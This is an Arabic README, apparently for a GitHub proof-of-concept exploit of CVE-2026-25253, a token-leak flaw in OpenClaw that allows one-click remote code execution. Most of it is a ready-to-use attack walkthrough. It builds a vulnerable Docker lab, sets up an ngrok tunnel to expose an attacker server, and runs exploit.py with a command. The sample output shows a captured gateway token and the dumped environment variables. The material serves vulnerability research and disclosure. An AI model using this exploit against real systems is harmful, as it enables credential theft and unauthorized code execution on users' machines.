
استخراج رمز مصادقة OpenClaw
★ CVE-2026-25253 إثبات اختراق (PoC) لثغرة OpenClaw لتنفيذ الأكواد عن بُعد بنقرة واحدة ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : ثغرة تسريب رمز مصادقة OpenClaw
الوصف: يسمح OpenClaw (المعروف أيضًا باسم clawdbot أو Moltbot) قبل الإصدار v2026.1.29 للمهاجمين بتسريب رمز مصادقة البوابة المخزَّن عن طريق تزويد واجهة التحكم (Control UI) بقيمة gatewayUrl مُصنّعة في سلسلة الاستعلام، مما يؤدي تلقائيًا إلى إنشاء اتصال WebSocket دون تحقق أو تأكيد من المستخدم. ويمكن أن يؤدي ذلك إلى وصول غير مصرح به إلى البوابة وتنفيذ أكواد عن بُعد بنقرة واحدة.
Dockerfile — لبناء بيئة OpenClaw الهشّةtemplates/ — صفحات ويب خبيثة يستخدمها الاستغلالconfig.txt — إعدادات OpenClaw المستخدمة في بيئة الضحيةexploit.py — خادم الاستغلالrequirements.txt — تبعيات إثبات الاختراق (PoC)docker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txtpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
مثال:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة شهريًا. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا.